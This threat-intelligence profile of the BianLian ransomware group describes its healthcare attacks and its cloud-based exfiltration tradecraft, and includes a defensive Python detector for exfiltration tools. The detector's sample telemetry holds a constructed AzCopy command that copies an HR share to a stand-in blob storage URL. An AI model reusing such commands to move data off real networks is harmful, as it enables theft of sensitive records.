Bianlian

Threat Actor updated 19 hours ago (2024-11-20T18:08:27.438Z)
BianLian is a threat actor group known primarily for ransomware and data-extortion attacks. The group has been particularly active in 2024, when it exploited bugs in JetBrains TeamCity to gain initial access to victim networks; these intrusions caused significant disruptions and data breaches across several sectors.

Healthcare has been a particular focus. BianLian claimed responsibility for an April attack on MMC's healthcare services that disrupted operations for several days and resulted in a data breach affecting 559,000 individuals. Other victims include Tennessee-based Murfreesboro Medical Clinic & SurgiCenter and, more recently, Boston Children's Health Physicians, whose stolen patient and employee data the group threatened to publish on its dark web leak site. According to a GuidePoint Security threat intelligence report, BianLian ranked among the top three ransomware groups targeting the healthcare sector by victim volume during the first nine months of 2024. The group has also hit other industries, as the attacks on Evolution Mining and Northern Minerals earlier in 2024 show.

In September 2024, modePUSH reported that BianLian and the Rhysida ransomware group had changed their exfiltration tradecraft: they began using Azure Storage Explorer to move stolen data out of victim environments, abandoning historically popular tools such as MEGAsync and rclone. SentinelLabs noted the same change in its own report. Separately, Trend Micro reported in October 2024 that a ransomware actor mimicking the notorious LockBit group used samples that leverage Amazon S3 storage to exfiltrate data stolen from targeted Windows and macOS systems, a similar move toward legitimate cloud storage as the exfiltration channel.
Description last updated: 2024-11-15T16:09:03.714Z
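The exfiltration tradecraft described above (Azure Storage Explorer and its bundled AzCopy, MEGAsync, rclone, and Amazon S3 endpoints) leaves traces in ordinary endpoint telemetry. The following is an added example, not code from this page, from Cybergeist, or from any of the cited reports: it correlates constructed, Sysmon-style process-creation and network-connection records by host and process ID, flags execution of the named tools and connections to cloud storage endpoints, and scores each finding. The JSON field names, the allow-listed backup host, the severity model and the sample events are all assumptions made for the example.

```python
"""
Detect cloud-storage exfiltration tooling (Azure Storage Explorer / AzCopy,
rclone, MEGAsync) and connections to cloud storage endpoints in endpoint
telemetry. Added example, not code from the page or any vendor report. The
record format is a simplified, constructed JSON-lines rendering of Sysmon
process-create (event_id 1) and network-connect (event_id 3) events; the field
names, the allow-list and the severity tiers are assumptions.
"""
import json

# Image basenames of the exfiltration tools named on the page (lower-case).
EXFIL_TOOLS = {
    "azcopy.exe": "AzCopy (bundled with Azure Storage Explorer)",
    "storageexplorer.exe": "Azure Storage Explorer",
    "rclone.exe": "rclone",
    "megasync.exe": "MEGAsync",
}

# Cloud storage domains, as DNS label sequences matched at the end of a hostname.
CLOUD_STORAGE_SUFFIXES = (
    ["blob", "core", "windows", "net"],   # Azure Blob Storage
    ["file", "core", "windows", "net"],   # Azure Files
    ["mega", "nz"],                       # MEGA
    ["mega", "co", "nz"],
)

# Hosts with a sanctioned reason to talk to cloud storage (constructed allow-list).
ALLOWLISTED_HOSTS = {"backup01"}

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def image_basename(path):
    """Return the lower-cased file name of a Windows or POSIX image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_cloud_storage(hostname):
    """True for Azure Storage, MEGA and Amazon S3 endpoints. Matching is on whole
    DNS labels so that look-alike names such as notmega.nz do not match."""
    labels = hostname.lower().rstrip(".").split(".")
    if any(labels[-len(s):] == s for s in CLOUD_STORAGE_SUFFIXES):
        return True
    # S3 forms: s3.amazonaws.com, <bucket>.s3.amazonaws.com, s3.<region>.amazonaws.com
    # and legacy s3-<region>.amazonaws.com. Other AWS services (ec2, sts, ...) do not match.
    return labels[-2:] == ["amazonaws", "com"] and any(
        l == "s3" or l.startswith("s3-") for l in labels[:-2])


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def analyze(events):
    """Correlate process creation and network connections by (host, pid) and
    return findings sorted by severity. Severity model (an assumption):
      critical: a known exfil tool opened a connection to cloud storage
      high:     a known exfil tool was executed (no connection seen yet)
      medium:   another process on a non-allow-listed host reached cloud storage
      low:      cloud-storage connection with no process context in the window"""
    procs = {}      # (host, pid) -> process-create record
    findings = []
    for ev in events:
        host, pid = ev["host"], ev["pid"]
        if ev["event_id"] == 1:
            procs[(host, pid)] = ev
            tool = EXFIL_TOOLS.get(image_basename(ev["image"]))
            if tool:
                findings.append({"host": host, "severity": "high",
                                 "reason": f"{tool} run by {ev['user']}: {ev['cmdline']}"})
        elif ev["event_id"] == 3:
            dest = ev["dest_host"]
            if host in ALLOWLISTED_HOSTS or not is_cloud_storage(dest):
                continue
            proc = procs.get((host, pid))
            if proc is None:
                sev, who = "low", f"pid {pid} (no process-create event seen)"
            elif image_basename(proc["image"]) in EXFIL_TOOLS:
                sev, who = "critical", EXFIL_TOOLS[image_basename(proc["image"])]
            else:
                sev, who = "medium", image_basename(proc["image"])
            findings.append({"host": host, "severity": sev,
                             "reason": f"{who} connected to {dest}:{ev['dest_port']}"})
    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


# Constructed sample telemetry: two workstations and one sanctioned backup host.
SAMPLE_LOG = r"""
{"event_id": 1, "host": "ws-fin-07", "pid": 4120, "user": "CORP\\j.doe", "image": "C:\\Tools\\AzCopy.exe", "cmdline": "azcopy.exe copy \"D:\\Shares\\HR\" \"https://exampletenant.blob.core.windows.net/drop?sv=2023-11-03&sig=REDACTED\" --recursive"}
{"event_id": 3, "host": "ws-fin-07", "pid": 4120, "dest_host": "exampletenant.blob.core.windows.net", "dest_port": 443}
{"event_id": 3, "host": "backup01", "pid": 880, "dest_host": "corpbackup.blob.core.windows.net", "dest_port": 443}
{"event_id": 1, "host": "ws-eng-12", "pid": 2210, "user": "CORP\\svc-build", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoProfile -File C:\\Temp\\sync.ps1"}
{"event_id": 3, "host": "ws-eng-12", "pid": 2210, "dest_host": "mega.nz", "dest_port": 443}
{"event_id": 3, "host": "ws-eng-12", "pid": 9999, "dest_host": "exfil-drop.s3.amazonaws.com", "dest_port": 443}
"""

SAMPLE_EVENTS = load_events(SAMPLE_LOG)

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper():8}] {f['host']}: {f['reason']}")
```

Run as a script to print the findings for the embedded sample; in practice, feed it Sysmon Event ID 1 and 3 records converted to the same shape. AzCopy and Storage Explorer are also used by legitimate administrators, so the allow-list and the severity tiers, not the tool name alone, are what keep this from paging on every backup job; the process-to-connection correlation is what separates an operator pushing a file share to an attacker-controlled storage account from a scheduled sync.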
Aliases: none currently tracked
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Extortion
Backdoor
Malware
Ransom
Exploit
Encryption
Windows
Lateral Move...
Encrypt
Healthcare
Teamcity
PowerShell
Android
Azure
Australian
T1566
Exploits
Antivirus
Implant
CISA
Associated Malware
LockBit (association type: Unspecified; votes: 4)
LockBit is a malicious software, or malware, known for its damaging and exploitative functions. It infiltrates systems via dubious downloads, emails, or websites, often without the user's knowledge, and can steal personal information, disrupt operations, or hold data hostage for ransom. The LockBit

BlackBasta (association type: Unspecified; votes: 3)
BlackBasta is a notorious malware, particularly known for its ransomware attacks. The group behind it has been linked with other harmful software such as IcedID, NetSupport, Gozi, PikaBot, Pushdo, Quantum, Royal, and Nokoyawa. Artifacts and indicators of compromise (IoCs) suggest a possible relation

Black Basta (association type: is related to; votes: 2)
Black Basta is a notorious ransomware group known for sophisticated attacks that have targeted numerous high-profile entities. The group has demonstrated a remarkable ability to adapt its tactics, techniques, and procedures (TTPs), allowing it to evade security defenses

Clop (association type: Unspecified; votes: 2)
Clop, a malicious software (malware), is linked to a Russian-speaking cybercriminal group also known as Cl0p. It is designed to exploit and damage computer systems by stealing personal information, disrupting operations, or holding data hostage for ransom. In May 2023, the Clop group began exploitin

Cerberus (association type: Unspecified; votes: 2)
Cerberus is a potent Android banking trojan that first surfaced on underground marketplaces in 2019. It operates as a hidden application on the victim's device and infiltrates systems via suspicious downloads, emails, or websites without the user's awareness. Once inside, it

TeaBot (association type: Unspecified; votes: 2)
TeaBot, also known as Anatsa, is a sophisticated Android banking trojan first observed in 2021. In 2022 it was identified as one of the most active banking malware families alongside Flubot, Sharkbot, and Hydra. TeaBot, along with other notable banking

Karakurt (association type: Unspecified; votes: 2)
Karakurt is a data-extortion operation rather than a ransomware payload: it steals data and demands payment without encrypting systems. The group is affiliated with the notorious Conti cybercrime syndicate and ITG23, which are known for disruptive operations including data theft and ransom demands. In 2023, there was a
Associated Threat Actors
Alphv (association type: Unspecified; votes: 3)
Alphv, also known as BlackCat, is a notable ransomware threat actor. This Russian-speaking cybercriminal group has been involved in multiple high-profile ransomware attacks, including against healthcare providers. They gained significant attention after stealing 5TB

Vice Society (association type: Unspecified; votes: 2)
Vice Society, a threat actor active since 2021, has made significant waves in the cybersecurity world. The group is known for deploying various ransomware families, including BlackCat, Quantum Locker, Zeppelin, and its own branded variant of Zeppe

Qilin (association type: Unspecified; votes: 2)
Qilin, a ransomware threat actor, has been on the rise, with its victim count increasing by 44% to reach 140 in Q3. Qilin ransomware has also been adopted by the Octo Tempest group, which recently added RansomHub and Qilin to its arsenal, enhancing its capabilities to

Rhysida (association type: Unspecified; votes: 2)
Rhysida is a globally active threat actor known for its ransomware operations, which have impacted a wide range of sectors, particularly government and the public sector. Its use of CleanUpLoader makes its operations effective and difficult to detect, as the loader not only facilitates persistenc

White Rabbit (association type: Unspecified; votes: 2)
White Rabbit is a notable threat actor known for its malicious activities and its association with other prominent hacking groups. The group takes its name from the White Rabbit character in Alice's Adventures in Wonderland. In
Source Document References
Information about the Bianlian Threat Actor was read from the documents corpus below (first 20 results).
Source                  Created
BankInfoSecurity        a month ago
CISA                    5 hours ago
InfoSecurity-magazine   6 days ago
DARKReading             6 days ago
Checkpoint              a month ago
BankInfoSecurity        a month ago
InfoSecurity-magazine   3 months ago
Securityaffairs         3 months ago
Securityaffairs         4 months ago
CERT-EU                 a year ago
Securityaffairs         4 months ago
Securityaffairs         4 months ago
DARKReading             4 months ago
Unit42                  4 months ago
Securityaffairs         4 months ago
Securityaffairs         4 months ago
Checkpoint              5 months ago
Securityaffairs         5 months ago
Securityaffairs         5 months ago
Securityaffairs         5 months ago